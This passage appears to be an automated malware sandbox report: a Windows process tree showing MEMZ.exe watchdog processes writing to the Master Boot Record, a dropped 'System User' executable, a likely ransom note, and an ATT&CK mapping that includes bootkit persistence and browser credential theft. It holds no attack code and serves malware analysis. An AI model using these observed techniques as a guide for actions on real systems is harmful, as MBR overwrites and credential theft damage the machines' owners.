  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --field-trial-handle=1868,i,6373813454583221199,18365006311207748646,262144 --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:3
  2⤵
  PID:664
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --field-trial-handle=2460,i,6373813454583221199,18365006311207748646,262144 --variations-seed-version --mojo-platform-channel-handle=2456 /prefetch:8
  2⤵
  PID:2024
- C:\Program Files (x86)\Microsoft\Edge\Application\127.0.2651.86\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\127.0.2651.86\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --field-trial-handle=4520,i,6373813454583221199,18365006311207748646,262144 --variations-seed-version --mojo-platform-channel-handle=4544 /prefetch:8
  2⤵
  PID:4176
- C:\Program Files (x86)\Microsoft\Edge\Application\127.0.2651.86\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\127.0.2651.86\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --field-trial-handle=4520,i,6373813454583221199,18365006311207748646,262144 --variations-seed-version --mojo-platform-channel-handle=4544 /prefetch:8
  2⤵
  PID:2260
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --field-trial-handle=120,i,6373813454583221199,18365006311207748646,262144 --variations-seed-version --mojo-platform-channel-handle=4776 /prefetch:8
  2⤵
  PID:552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --field-trial-handle=4752,i,6373813454583221199,18365006311207748646,262144 --variations-seed-version --mojo-platform-channel-handle=4832 /prefetch:8
  2⤵
  PID:1340
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --field-trial-handle=3272,i,6373813454583221199,18365006311207748646,262144 --variations-seed-version --mojo-platform-channel-handle=4160 /prefetch:8
  2⤵
  PID:1328
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3104,i,6373813454583221199,18365006311207748646,262144 --variations-seed-version --mojo-platform-channel-handle=4912 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --field-trial-handle=3904,i,6373813454583221199,18365006311207748646,262144 --variations-seed-version --mojo-platform-channel-handle=2816 /prefetch:8
  2⤵
  PID:2420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --field-trial-handle=1600,i,6373813454583221199,18365006311207748646,262144 --variations-seed-version --mojo-platform-channel-handle=3168 /prefetch:8
  2⤵
  PID:1808
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --pdf-upsell-enabled --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=1296,i,6373813454583221199,18365006311207748646,262144 --variations-seed-version --mojo-platform-channel-handle=2464 /prefetch:1
  2⤵
  PID:5924
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --pdf-upsell-enabled --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=3908,i,6373813454583221199,18365006311207748646,262144 --variations-seed-version --mojo-platform-channel-handle=4120 /prefetch:1
  2⤵
  PID:1268
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --field-trial-handle=5420,i,6373813454583221199,18365006311207748646,262144 --variations-seed-version --mojo-platform-channel-handle=5468 /prefetch:8
  2⤵
  PID:1228
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --field-trial-handle=5428,i,6373813454583221199,18365006311207748646,262144 --variations-seed-version --mojo-platform-channel-handle=5520 /prefetch:8
  2⤵
  PID:5568

C:\Program Files (x86)\Microsoft\Edge\Application\127.0.2651.86\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\127.0.2651.86\elevation_service.exe"
1⤵
PID:232

C:\Users\Admin\AppData\Roaming\System User
"C:\Users\Admin\AppData\Roaming\System User"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1732

C:\Users\Admin\AppData\Roaming\System User
"C:\Users\Admin\AppData\Roaming\System User"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2360

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1692

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\UnregisterRevoke.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:3656

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:1004
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:3616
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2000 -parentBuildID 20240401114208 -prefsHandle 1920 -prefMapHandle 1912 -prefsLen 23602 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a7ebd3c3-6f55-4b39-a909-1e8deea77a0f} 3616 "\\.\pipe\gecko-crash-server-pipe.3616" gpu
    3⤵
    PID:2084
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2412 -parentBuildID 20240401114208 -prefsHandle 2404 -prefMapHandle 2400 -prefsLen 23638 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {16595b9c-3a77-4e1a-b651-77c4b8d96755} 3616 "\\.\pipe\gecko-crash-server-pipe.3616" socket
    3⤵
    PID:3304
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2672 -childID 1 -isForBrowser -prefsHandle 3176 -prefMapHandle 2704 -prefsLen 23779 -prefMapSize 244628 -jsInitHandle 1316 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ecf785d6-f9e9-4d2e-9ef1-470b471b7e7c} 3616 "\\.\pipe\gecko-crash-server-pipe.3616" tab
    3⤵
    PID:552
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3428 -childID 2 -isForBrowser -prefsHandle 3588 -prefMapHandle 3684 -prefsLen 29012 -prefMapSize 244628 -jsInitHandle 1316 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3de32c12-9eed-4259-9b9c-b342ac13d1fe} 3616 "\\.\pipe\gecko-crash-server-pipe.3616" tab
    3⤵
    PID:2876
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1536 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 1556 -prefMapHandle 1268 -prefsLen 29119 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1061bcab-5a68-40b0-92e5-d740513a08c6} 3616 "\\.\pipe\gecko-crash-server-pipe.3616" utility
    3⤵
    - Checks processor information in registry
    PID:6104
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5172 -childID 3 -isForBrowser -prefsHandle 5168 -prefMapHandle 5180 -prefsLen 26989 -prefMapSize 244628 -jsInitHandle 1316 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f035963e-bc75-4c43-95a4-167739fde7ac} 3616 "\\.\pipe\gecko-crash-server-pipe.3616" tab
    3⤵
    PID:5440
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5160 -childID 4 -isForBrowser -prefsHandle 5188 -prefMapHandle 5124 -prefsLen 26989 -prefMapSize 244628 -jsInitHandle 1316 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {262f64f5-085e-44d2-8bbf-bfde848d88e4} 3616 "\\.\pipe\gecko-crash-server-pipe.3616" tab
    3⤵
    PID:5432
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5404 -childID 5 -isForBrowser -prefsHandle 5392 -prefMapHandle 5384 -prefsLen 26989 -prefMapSize 244628 -jsInitHandle 1316 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {826eab96-93ac-49d3-b24d-bd98d7b8f0a8} 3616 "\\.\pipe\gecko-crash-server-pipe.3616" tab
    3⤵
    PID:5388

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2736
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffa1f60cc40,0x7ffa1f60cc4c,0x7ffa1f60cc58
  2⤵
  PID:4188
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1936,i,9415820320881719908,1014558855580864410,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1944 /prefetch:2
  2⤵
  PID:4440
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2188,i,9415820320881719908,1014558855580864410,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2424 /prefetch:3
  2⤵
  PID:2216
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2220,i,9415820320881719908,1014558855580864410,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2456 /prefetch:8
  2⤵
  PID:2880
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3136,i,9415820320881719908,1014558855580864410,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3156 /prefetch:1
  2⤵
  PID:2120
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3180,i,9415820320881719908,1014558855580864410,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3196 /prefetch:1
  2⤵
  PID:4564
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4568,i,9415820320881719908,1014558855580864410,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4580 /prefetch:1
  2⤵
  PID:5176
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4884,i,9415820320881719908,1014558855580864410,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4940 /prefetch:8
  2⤵
  PID:5524
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5020,i,9415820320881719908,1014558855580864410,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4968 /prefetch:8
  2⤵
  PID:5984
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=5188,i,9415820320881719908,1014558855580864410,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4784 /prefetch:1
  2⤵
  PID:5484
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=5252,i,9415820320881719908,1014558855580864410,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5308 /prefetch:1
  2⤵
  PID:5356
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5568,i,9415820320881719908,1014558855580864410,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5596 /prefetch:8
  2⤵
  PID:5256
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5560,i,9415820320881719908,1014558855580864410,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5616 /prefetch:8
  2⤵
  PID:1292
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5576,i,9415820320881719908,1014558855580864410,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5896 /prefetch:8
  2⤵
  PID:1420
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5484,i,9415820320881719908,1014558855580864410,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5540 /prefetch:8
  2⤵
  PID:5260
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5888,i,9415820320881719908,1014558855580864410,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5296 /prefetch:8
  2⤵
  - Drops file in System32 directory
  PID:4276

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
PID:1220
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa1f60cc40,0x7ffa1f60cc4c,0x7ffa1f60cc58
  2⤵
  PID:1536

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4976

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:5452

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:5932

C:\Users\Admin\Desktop\MEMZ.exe
"C:\Users\Admin\Desktop\MEMZ.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5972
- C:\Users\Admin\Desktop\MEMZ.exe
  "C:\Users\Admin\Desktop\MEMZ.exe" /watchdog
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:5844
- C:\Users\Admin\Desktop\MEMZ.exe
  "C:\Users\Admin\Desktop\MEMZ.exe" /watchdog
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:5220
- C:\Users\Admin\Desktop\MEMZ.exe
  "C:\Users\Admin\Desktop\MEMZ.exe" /watchdog
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:5224
- C:\Users\Admin\Desktop\MEMZ.exe
  "C:\Users\Admin\Desktop\MEMZ.exe" /watchdog
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:5940
- C:\Users\Admin\Desktop\MEMZ.exe
  "C:\Users\Admin\Desktop\MEMZ.exe" /watchdog
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:4656
- C:\Users\Admin\Desktop\MEMZ.exe
  "C:\Users\Admin\Desktop\MEMZ.exe" /main
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Writes to the Master Boot Record (MBR)
  - System Location Discovery: System Language Discovery
  PID:5656
- - C:\Windows\SysWOW64\notepad.exe
    "C:\Windows\System32\notepad.exe" \note.txt
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5644
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=dank+memz
    3⤵
    PID:5160

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa38da055 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:6248

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Discovery

Browser Information Discovery

T1217

Query Registry

System Information Discovery